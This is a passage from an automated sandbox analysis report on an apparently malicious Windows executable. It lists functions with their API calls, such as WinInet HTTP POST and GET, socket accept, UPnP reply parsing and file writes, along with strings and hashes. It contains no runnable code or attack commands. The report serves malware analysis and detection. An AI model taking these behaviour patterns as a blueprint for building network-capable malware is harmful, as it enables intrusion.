                                              control_flow_graph 576 401920-401947 GetTickCount WaitForSingleObject 577 401ac9-401acf 576->577 578 40194d-401964 WSAWaitForMultipleEvents 576->578 579 4019f0-401a03 GetTickCount 578->579 580 40196a-401981 WSAEnumNetworkEvents 578->580 582 401a43-401a4c GetTickCount 579->582 583 401a05-401a14 EnterCriticalSection 579->583 580->579 581 401983-401988 580->581 581->579 584 40198a-401990 581->584 585 401ab5-401ac3 WaitForSingleObject 582->585 586 401a4e-401a5d EnterCriticalSection 582->586 587 401a16-401a1d 583->587 588 401a3a-401a41 LeaveCriticalSection 583->588 584->579 591 401992-4019b1 accept 584->591 585->577 585->578 592 401aa1-401ab1 LeaveCriticalSection GetTickCount 586->592 593 401a5f-401a77 InterlockedExchangeAdd call 40da30 586->593 589 401a35 call 401820 587->589 590 401a1f-401a27 587->590 588->585 589->588 590->587 594 401a29-401a30 LeaveCriticalSection 590->594 591->579 596 4019b3-4019c2 call 4022c0 591->596 592->585 601 401a97-401a9f 593->601 602 401a79-401a82 593->602 594->585 596->579 603 4019c4-4019df call 401740 596->603 601->592 601->593 602->601 604 401a84-401a8d call 40b0d0 602->604 603->579 609 4019e1-4019e7 603->609 604->601 609->579 610 4019e9-4019eb call 401cf0 609->610 610->579
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040192C
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                              • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                              • accept.WS2_32(?,?,?), ref: 004019A8
                                              • GetTickCount.KERNEL32 ref: 004019F6
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                              • GetTickCount.KERNEL32 ref: 00401A43
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                              • GetTickCount.KERNEL32 ref: 00401AAB
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                              • String ID: PCOI$ilci
                                              • API String ID: 3345448188-3762367603
                                              • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction ID: 052bb906b72d623838b809fd2f084fe798b134d15a2779f83897d066d1444b79
                                              • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction Fuzzy Hash: 3441F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99
                                              Function 0040EA80 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 0040EAA8
                                              • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EAF8
                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EB0B
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EB44
                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EB7A
                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EBA5
                                              • HttpSendRequestA.WININET(00000000,004120C8,000000FF,00009E34), ref: 0040EBCF
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EC0E
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040EC60
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC91
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC9E
                                              • InternetCloseHandle.WININET(00000000), ref: 0040ECAB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                              • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                              • API String ID: 2761394606-2217117414
                                              • Opcode ID: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction ID: c905a0693736bdbf34c7f8e0e7db626079e62ceb693e66bb4324beed71749724
                                              • Opcode Fuzzy Hash: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction Fuzzy Hash: 33514CB5901228ABDB26CF54CC94BDDB7BCAB48705F0481E9B60DA6280C7B96FC4CF54
                                              Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                              • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                              • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                              • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                              • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                              • WSACloseEvent.WS2_32(?), ref: 00401715
                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                              • String ID: PCOI$ilci
                                              • API String ID: 2403999931-3762367603
                                              • Opcode ID: af844558824ef2f0cd234010a78707101b1275eb600f87e7949f258bb1116b4d
                                              • Instruction ID: 5b8540bf1bb466d15bf787bf2847de779fcfe5b3cc035b7f1a74ac98c73710f1
                                              • Opcode Fuzzy Hash: af844558824ef2f0cd234010a78707101b1275eb600f87e7949f258bb1116b4d
                                              • Instruction Fuzzy Hash: D731A875900705ABC710EF70EC48B97B7B8BF08710F048A2AF559A3691C779F894CB98
                                              Function 00405820 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 00405838
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                              • Sleep.KERNEL32(00000001), ref: 00405864
                                              • GetTickCount.KERNEL32 ref: 0040586A
                                              • GetTickCount.KERNEL32 ref: 00405873
                                              • wsprintfW.USER32 ref: 00405886
                                              • RegisterClassExW.USER32(00000030), ref: 00405893
                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                              • TranslateMessage.USER32(?), ref: 004058E5
                                              • DispatchMessageA.USER32(?), ref: 004058EF
                                              • ExitThread.KERNEL32 ref: 00405901
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                              • String ID: %x%X$0
                                              • API String ID: 716646876-225668902
                                              • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction ID: 26b7d68298067a6ce37e9ddfddb25a36523320ae21639d5819629e884720d218
                                              • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction Fuzzy Hash: 47212C71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69
                                              Function 0040E150 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 725 40e150-40e1eb memset InternetCrackUrlA InternetOpenA 726 40e1f1-40e224 InternetConnectA 725->726 727 40e367-40e370 725->727 728 40e35a-40e361 InternetCloseHandle 726->728 729 40e22a-40e25a HttpOpenRequestA 726->729 728->727 730 40e260-40e277 HttpSendRequestA 729->730 731 40e34d-40e354 InternetCloseHandle 729->731 732 40e340-40e347 InternetCloseHandle 730->732 733 40e27d-40e281 730->733 731->728 732->731 734 40e336 733->734 735 40e287 733->735 734->732 736 40e291-40e298 735->736 737 40e329-40e334 736->737 738 40e29e-40e2c0 InternetReadFile 736->738 737->732 739 40e2c2-40e2c9 738->739 740 40e2cb 738->740 739->740 741 40e2cd-40e324 call 40a570 memcpy 739->741 740->737 741->736
                                              APIs
                                              • memset.NTDLL ref: 0040E178
                                              • InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040E30A
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E347
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E354
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                              • String ID: <$GET
                                              • API String ID: 1205665004-427699995
                                              • Opcode ID: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction ID: 0e0ad4ad31c216dc2eff2ccec99c89ab6a28dd79d12b38366d41975b782ec3ac
                                              • Opcode Fuzzy Hash: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction Fuzzy Hash: 6E511BB5901228ABDB36CB50CC55BE9B7BCAB44705F0444E9A60DAA2C0D7B96BC4CF54
                                              Function 0040ED50 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ED82
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EDA3
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EDC2
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EDDB
                                              • memcmp.NTDLL ref: 0040EE6D
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EE90
                                              • CloseHandle.KERNEL32(00000000), ref: 0040EE9A
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEA4
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EEC3
                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EEE8
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEF2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                              • String ID:
                                              • API String ID: 3902698870-0
                                              • Opcode ID: 7ad1fe91360db5ea26f22c98dcdf1cd4795f1c803dd98443715d61a40f1b6e9d
                                              • Instruction ID: 4e6ec57638d856f2454fe90bbc3b1fbf5740e030230db4960ae301055fb20e21
                                              • Opcode Fuzzy Hash: 7ad1fe91360db5ea26f22c98dcdf1cd4795f1c803dd98443715d61a40f1b6e9d
                                              • Instruction Fuzzy Hash: 34515FB4E40208FBDB14DFA4CC49BDFB774AB48704F108569E615B72C0D7B9AA45CB98
                                              Function 0040D860 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 0040D866
                                              • GetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,?,000000FF), ref: 0040D86D
                                              • GetCurrentThread.KERNEL32 ref: 0040D878
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,?,000000FF), ref: 0040D87F
                                              • InterlockedExchangeAdd.KERNEL32(0040805F,00000000), ref: 0040D8A2
                                              • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D8D7
                                              • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D922
                                              • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D93E
                                              • Sleep.KERNEL32(00000001), ref: 0040D96E
                                              • GetCurrentThread.KERNEL32 ref: 0040D97D
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F), ref: 0040D984
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                              • String ID:
                                              • API String ID: 3862671961-0
                                              • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction ID: d6bd3df3806ede59070add2f0d7a1f8bc277f5a62d9d5dceae4a540d753efef8
                                              • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction Fuzzy Hash: 80413CB4E00209EBDB14DFE4D848BAEBB75EF44305F10C16AE911A7390D7789A85CF59
                                              Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                              • setsockopt.WS2_32 ref: 00401F2C
                                              • closesocket.WS2_32(?), ref: 00401F39
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                              • String ID:
                                              • API String ID: 671207744-0
                                              • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction ID: 8c1e587a25cfc232de2ab0883eb36e20e47ed0b1207a5ae34e006e610dd4584e
                                              • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction Fuzzy Hash: F2519F75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                              Function 0040DE20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                              • Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                              • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                              • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                              • StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleeprecvfrom
                                              • String ID: HTTP/1.1 200 OK$LOCATION:
                                              • API String ID: 668330359-3973262388
                                              • Opcode ID: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction ID: cf4c7c589cb5a2b5626e628c2cbe2bc4730fcdb76fc9a6090f7a4287b0899cde
                                              • Opcode Fuzzy Hash: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction Fuzzy Hash: C92142B0944218ABDB20CB64DC49BE97774AB14308F1085E9E7197B2C0D7B99ACACF5C
                                              Function 0040EFC0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EFD7
                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EFF6
                                              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F01F
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F048
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F052
                                              • Sleep.KERNEL32(000003E8), ref: 0040F05D
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EFD2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 2743515581-2272513262
                                              • Opcode ID: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction ID: b5bc459e60af10a5ecd3bce89b92fe6334010ad2bd78cd38f87cd536e4e3c5ce
                                              • Opcode Fuzzy Hash: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction Fuzzy Hash: 6821FC74A40208FBDB20DF94CC49FDEB775AB44705F1085A5FA11AB2C1C7B96A44CB59
                                              Function 0040B850 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00417F40,?,?,?,?,?,?,00407FE3), ref: 0040B85B
                                              • CreateFileW.KERNEL32(00417D28,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B8AD
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B8CE
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B8ED
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B902
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B968
                                              • CloseHandle.KERNEL32(00000000), ref: 0040B972
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B97C
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                              • String ID:
                                              • API String ID: 439099756-0
                                              • Opcode ID: 929abe7a9095254e26be5e4d35e4c48d0475e135154847a51b6584f6b16baab1
                                              • Instruction ID: 20bf7a335d7b83d19979346108b4db2f5a5138f5ba8950715db26485b9768e75
                                              • Opcode Fuzzy Hash: 929abe7a9095254e26be5e4d35e4c48d0475e135154847a51b6584f6b16baab1
                                              • Instruction Fuzzy Hash: 84413AB4E40308ABDB10DFA4CC4AFAEB774EB04704F208569E611BA2D1C7B96641CB9D
                                              Function 00405B60 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(004174D8,?,?,?,?,?,00407FAD), ref: 00405B6B
                                              • CreateFileW.KERNEL32(00417708,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407FAD), ref: 00405B85
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                              • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                              • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                              • String ID:
                                              • API String ID: 3956458805-0
